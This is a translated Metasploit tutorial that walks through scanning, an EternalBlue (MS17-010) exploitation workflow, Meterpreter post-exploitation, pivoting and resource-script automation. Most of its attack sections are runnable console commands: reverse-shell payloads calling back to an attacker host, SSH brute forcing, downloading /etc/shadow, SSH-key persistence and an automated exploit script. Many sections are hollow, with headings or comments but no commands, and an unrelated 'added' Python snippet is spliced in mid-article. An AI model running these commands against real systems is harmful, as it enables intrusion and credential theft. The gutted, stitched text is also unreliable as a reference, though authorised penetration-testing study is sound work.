# Metasploit Complete Practical Tutorial: Module Architecture, EternalBlue Exploitation Workflow, Meterpreter and MSFvenom
Metasploit Framework is the world's most widely used penetration testing framework. It was created by HD Moore in 2003 and is maintained today by Rapid7. It brings every phase of a penetration test (information gathering, vulnerability exploitation, post-exploitation and reporting) into one unified platform, which greatly improves testing efficiency. This article starts with Metasploit's architectural design, then goes into its core modules, real exploitation workflows, Meterpreter session management and automated attack techniques, walking through a complete penetration test from scanning to getting a shell.
## Metasploit architecture overview
Metasploit Framework adopts a modular architecture, and each component performs its own duties:
### Core module types
### Payload types explained
```bash
# Payloads fall into three categories:

# 1. Singles: self-contained payloads that run on their own and are small
#    Naming format: <platform>/[arch]/<single>
#    Example: linux/x64/shell_reverse_tcp

# 2. Stagers: set up the connection channel and download the Stage
#    Naming format: components separated by '/'
#    Example: windows/x64/meterpreter/reverse_tcp
#                                     ^ stager

# 3. Stages: large payloads downloaded through a Stager
#    e.g. Meterpreter, VNC injection

# How to tell them apart:
# shell_reverse_tcp       -> Single (no '/' separator)
# shell/reverse_tcp       -> Staged (stager separated by '/')
# meterpreter/reverse_tcp -> Staged Meterpreter
```

## Basic msfconsole usage
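As an added example that is not part of the original article, the following Python parser applies the naming rule above to split a payload name into its platform, optional architecture, and either a single payload or a stage/stager pair. The set of architecture names it recognises is an assumption made for the example, not a complete list.

```python
# Added example (not from the original article): classify a Metasploit
# payload name as Single or Staged using the naming rule described above.
# KNOWN_ARCHES is an assumption for this example; Metasploit supports
# more architectures than are listed here.
from dataclasses import dataclass
from typing import Optional

KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle",
                "mipsbe", "mips64", "ppc", "ppc64", "sparc"}


@dataclass
class PayloadName:
    platform: str
    arch: Optional[str]
    kind: str                      # "single" or "staged"
    single: Optional[str] = None   # e.g. shell_reverse_tcp
    stage: Optional[str] = None    # e.g. meterpreter
    stager: Optional[str] = None   # e.g. reverse_tcp


def parse_payload_name(name: str) -> PayloadName:
    """Parse '<platform>/[arch]/<single>' or '<platform>/[arch]/<stage>/<stager>'."""
    parts = name.strip().strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = None
    # The architecture component is optional; consume it only if recognised.
    if rest and rest[0] in KNOWN_ARCHES:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 1:
        # No further '/' separator: a self-contained Single payload.
        return PayloadName(platform, arch, "single", single=rest[0])
    if len(rest) == 2:
        # '<stage>/<stager>': the stager connects back and fetches the stage.
        return PayloadName(platform, arch, "staged", stage=rest[0], stager=rest[1])
    raise ValueError(f"unexpected payload layout: {name!r}")


if __name__ == "__main__":
    for n in ("linux/x64/shell_reverse_tcp", "windows/x64/meterpreter/reverse_tcp",
              "windows/meterpreter/reverse_tcp"):
        print(n, "->", parse_payload_name(n))
```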
### Startup and core commands
```bash
# Start Metasploit (the database must be initialised on first start)
sudo msfdb init
msfconsole

# Check the database connection
msf6 > db_status

# Core navigation commands

# Workspace management (isolating different projects)
```

### Module search techniques

```bash
# Basic search
msf6 > search eternalblue
msf6 > search apache
msf6 > search type:exploit platform:linux

# Advanced search filters
msf6 > search type:exploit name:smb
msf6 > search type:auxiliary name:scanner
msf6 > search cve:2021-44228            # search by CVE
msf6 > search platform:linux type:exploit rank:excellent
msf6 > search author:hdm

# Meaning of the result fields
# Name: module name
# Disclosure Date: date the vulnerability was made public
# Rank: reliability rank (excellent > great > good > normal > average > low)
# Check: whether the module supports the check command (non-destructive test)

# Search Exploit-DB offline
searchsploit eternalblue
searchsploit -m 42315                   # copy the exploit into the current directory
```

## Information gathering modules in practice
Metasploit's Auxiliary modules contain a large number of information gathering functions.
### Port scanning
```bash
# TCP port scan
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(tcp) > set PORTS 1-1000
msf6 auxiliary(tcp) > set THREADS 50
msf6 auxiliary(tcp) > run

# SYN scan
```

### Service version detection

```bash
# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > run

# SSH version detection
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ssh_version) > run

# FTP version detection
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ftp_version) > run

# HTTP server information
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(http_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(http_version) > run

# Review what has been collected in the database
msf6 > hosts              # discovered hosts
msf6 > services           # discovered services
msf6 > services -p 445    # filter by port
msf6 > vulns              # discovered vulnerabilities
```

### Service enumeration
```bash
# SMB share enumeration
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(smb_enumshares) > set RHOSTS 192.168.1.100
msf6 auxiliary(smb_enumshares) > run

# SMB user enumeration

# FTP anonymous login detection

# SNMP enumeration

# HTTP directory scan
```

### Vulnerability detection

```bash
# MS17-010 (EternalBlue) vulnerability check
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_ms17_010) > run

# Shellshock vulnerability check
msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.100
msf6 auxiliary(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/
msf6 auxiliary(apache_mod_cgi_bash_env) > run

# SSH brute force
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(ssh_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(ssh_login) > set USERNAME root
msf6 auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(ssh_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(ssh_login) > set THREADS 10
msf6 auxiliary(ssh_login) > run
```

## Exploitation in practice: MS17-010 (EternalBlue) complete workflow
EternalBlue is an NSA exploitation tool leaked by the Shadow Brokers in 2017; it exploits a vulnerability in the Windows SMB protocol to achieve remote code execution. Below is the complete exploitation workflow using Metasploit.
### Step 1: Target discovery and vulnerability confirmation
```bash
# 1. Scan the target subnet for hosts with port 445 open
msf6 > db_nmap -sS -sV -p 445 192.168.1.0/24

# 2. Confirm the MS17-010 vulnerability
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
```

### Step 2: Configure and execute the exploit

```bash
# 3. Select the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# 4. Show module information
msf6 exploit(ms17_010_eternalblue) > info

# 5. Review and configure options
msf6 exploit(ms17_010_eternalblue) > show options

# 6. Set the target IP
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100

# 7. Set the payload (Meterpreter)
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 8. Set the callback address
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444

# 9. Optional: verify with the check command (non-destructive)
msf6 exploit(ms17_010_eternalblue) > check

# 10. Launch the exploit
msf6 exploit(ms17_010_eternalblue) > exploit

# [*] Started reverse TCP handler on 192.168.1.50:4444
# [*] Sending exploit packet...
# [*] Sending stage (200774 bytes) to 192.168.1.100
# [*] Meterpreter session 1 opened
# meterpreter >
```

### Linux target exploitation example (SambaCry)
```bash
# Exploit the Samba is_known_pipename vulnerability
msf6 > use exploit/linux/samba/is_known_pipename
msf6 exploit(is_known_pipename) > set RHOSTS 192.168.1.100
msf6 exploit(is_known_pipename) > set PAYLOAD linux/x64/shell_reverse_tcp
msf6 exploit(is_known_pipename) > set LHOST 192.168.1.50
msf6 exploit(is_known_pipename) > set TARGET 3
msf6 exploit(is_known_pipename) > exploit
```

## Meterpreter session management and common commands
Meterpreter is Metasploit's most powerful payload. It runs entirely in memory and provides a rich set of post-exploitation functions.
### Basic system commands
```bash
# System information
meterpreter > sysinfo                     # system information
meterpreter > getuid                      # current user
meterpreter > getpid                      # current process ID
meterpreter > ps                          # list processes
meterpreter > shell                       # drop into a system shell
meterpreter > exit                        # leave the shell and return to meterpreter

# File operations
meterpreter > pwd                         # current directory
meterpreter > ls                          # list files
meterpreter > cd /tmp                     # change directory
meterpreter > cat /etc/passwd             # read a file
meterpreter > download /etc/shadow /tmp/shadow   # download a file
meterpreter > upload /tmp/tool.sh /tmp/   # upload a file
meterpreter > edit /tmp/file.txt          # edit a file
meterpreter > mkdir /tmp/test             # create a directory
meterpreter > rm /tmp/test.txt            # delete a file

# Network information
meterpreter > ipconfig / ifconfig         # network interfaces
meterpreter > netstat                     # network connections
meterpreter > route                       # routing table
meterpreter > arp                         # ARP table
meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.20   # port forwarding
```

### Privileges and privilege escalation
```bash
# Check privileges
meterpreter > getuid
meterpreter > getsystem                   # attempt automatic privilege escalation

# Use the local exploit suggester module
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(local_exploit_suggester) > set SESSION 1
msf6 post(local_exploit_suggester) > run

# Use the specific privilege escalation modules it recommends
```

### Session management

```bash
# Background the current session
meterpreter > background
# or press Ctrl+Z

# List all sessions
msf6 > sessions
msf6 > sessions -l                        # list all sessions

# Interact with a given session
msf6 > sessions -i 1                      # enter session 1

# Run a single command on a session
msf6 > sessions -C "sysinfo" -i 1

# Upgrade a shell to Meterpreter
msf6 > sessions -u 1                      # upgrade a plain shell to meterpreter

# Terminate sessions
msf6 > sessions -k 1                      # kill session 1
msf6 > sessions -K                        # kill all sessions

# Managing multiple sessions
msf6 > sessions -l
# Active sessions
# ===============
#   Id  Type                   Information     Connection
#   --  ----                   -----------     ----------
#   1   meterpreter x64/linux  root @ target1  192.168.1.50:4444 -> 192.168.1.100:41832
#   2   shell x64/linux                        192.168.1.50:4445 -> 192.168.1.101:39211
```

## Post-exploitation modules
Metasploit's Post modules provide a rich set of post-exploitation functions.
### Information gathering
```bash
# Gather system information
msf6 > use post/linux/gather/enum_system
msf6 post(enum_system) > set SESSION 1
msf6 post(enum_system) > run

# Gather network information

# Gather users and password hashes

# Find sensitive files

# Gather SSH credentials

# Gather database credentials
```

### Privilege escalation modules

```bash
# Local privilege escalation suggestions
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(local_exploit_suggester) > set SESSION 1
msf6 post(local_exploit_suggester) > set SHOWDESCRIPTION true
msf6 post(local_exploit_suggester) > run

# Common Linux privilege escalation modules
msf6 > use exploit/linux/local/cve_2022_0847_dirtypipe
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf6 > use exploit/linux/local/sudo_baron_samedit
msf6 > use exploit/linux/local/overlayfs_priv_esc
```

### Persistence modules
```bash
# SSH key persistence
msf6 > use post/linux/manage/sshkey_persistence
msf6 post(sshkey_persistence) > set SESSION 1
msf6 post(sshkey_persistence) > set USERNAME root
msf6 post(sshkey_persistence) > run

# Cron persistence

# Service persistence
```

### Internal network routing and pivoting

```bash
# Add a route (reach the internal network through the compromised host)
meterpreter > run autoroute -s 10.10.10.0/24

# Or add it manually in msfconsole
msf6 > route add 10.10.10.0/24 1          # via session 1

# Show the routing table
msf6 > route print

# Set up a SOCKS proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(socks_proxy) > set SRVPORT 1080
msf6 auxiliary(socks_proxy) > set VERSION 5
msf6 auxiliary(socks_proxy) > run -j

# The internal network can now be scanned through the proxy
# configure proxychains with: socks5 127.0.0.1 1080
# proxychains nmap -sT -Pn 10.10.10.0/24

# Scan the internal network through the pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(tcp) > set PORTS 22,80,443,445,3389
msf6 auxiliary(tcp) > set THREADS 20
msf6 auxiliary(tcp) > run
```

## MSFvenom: payload generator
MSFvenom is Metasploit's standalone payload generation tool; it can create payloads in a wide range of formats.
```bash
# List all available payloads
msfvenom -l payloads

# List all available encoders
msfvenom -l encoders

# List all output formats
msfvenom -l formats

# === Linux payloads ===
# Linux reverse shell (ELF)
# Linux Meterpreter (ELF)

# === Web payloads ===
# PHP reverse shell
# Python reverse shell
# JSP reverse shell
# WAR package (for Tomcat)
# ASP reverse shell

# === Windows payloads ===
# Windows Meterpreter (EXE)
# Windows shellcode (for buffer overflows)

# === Encoding ===
# Encode with shikata_ga_nai (multiple iterations)
# Chain multiple encoders
# Exclude bad characters
```

### Executing the payload on the target

```bash
# Set up the listener on the attacker machine
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 0.0.0.0
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j       # -j runs the handler as a background job

# Run the payload on the target machine
chmod +x meterpreter.elf
./meterpreter.elf

# The attacker machine receives the connection
# [*] Meterpreter session 1 opened
msf6 > sessions -i 1
```

## Automation: Resource Scripts
A Resource Script is Metasploit's automation mechanism: a sequence of console commands saved to a script file and executed automatically.
### Creating a Resource Script
```bash
# Create the scan script scan.rc
cat > scan.rc << 'EOF'
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
set THREADS 50
run

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
EOF

# Execute the scan script
msfconsole -r scan.rc
```

### Automated exploit scripts

```bash
# Create the exploit script exploit.rc
cat > exploit.rc << 'EOF'
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set LPORT 4444
exploit -j -z

# Once the session is established, run post-exploitation automatically
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
EOF

# Execute
msfconsole -r exploit.rc
```

### Automated post-exploitation scripts
```bash
# Create the post-exploitation script post.rc
cat > post.rc << 'EOF'
# Gather system information
use post/linux/gather/enum_system
set SESSION 1
run

# Network information

# Password hashes

# Configuration files
EOF

msfconsole -r post.rc
```

### Recording and playback in msfconsole
```bash
# Record your actions (saved as a Resource Script)
msf6 > makerc /tmp/my_session.rc

# Load a Resource Script from inside msfconsole
msf6 > resource /tmp/my_session.rc

# Load a Resource Script at startup
msfconsole -r /tmp/my_session.rc
```

## Comprehensive practical case: complete penetration workflow
The following is an example of a complete penetration testing workflow:
```bash
# ====== Phase 1: Information gathering ======
msfconsole -q

# Initialise the workspace

# Review scan results

# ====== Phase 2: Vulnerability discovery ======

# ====== Phase 3: Vulnerability exploitation ======

# ====== Phase 4: Post-exploitation ======

# Upload tools

# ====== Phase 5: Lateral movement ======

# ====== Phase 6: Data export ======
```

## Security recommendations and defensive measures

1. **Timely patching**: Metasploit mostly exploits known vulnerabilities. Keeping systems and software up to date prevents the vast majority of these attacks.

## Summary

This article has walked through the Metasploit Framework from its architectural design to practical exploitation. Starting from Metasploit's module system, we covered msfconsole usage, the information gathering modules, the exploitation workflow (using EternalBlue as the example), Meterpreter session management, the post-exploitation modules, MSFvenom payload generation and Resource Script automation.

Metasploit is the "Swiss Army knife" of penetration testing, and mastering it greatly improves both the efficiency and the depth of an engagement. Tools, however, are only a means: understanding vulnerability principles, attack-chain logic and defensive thinking is the core competence of a security practitioner.

This series of penetration testing articles has now come to an end. I hope these six articles help you build a complete penetration testing knowledge system, and that you keep honing your skills and improving your capabilities within the scope of legal authorization.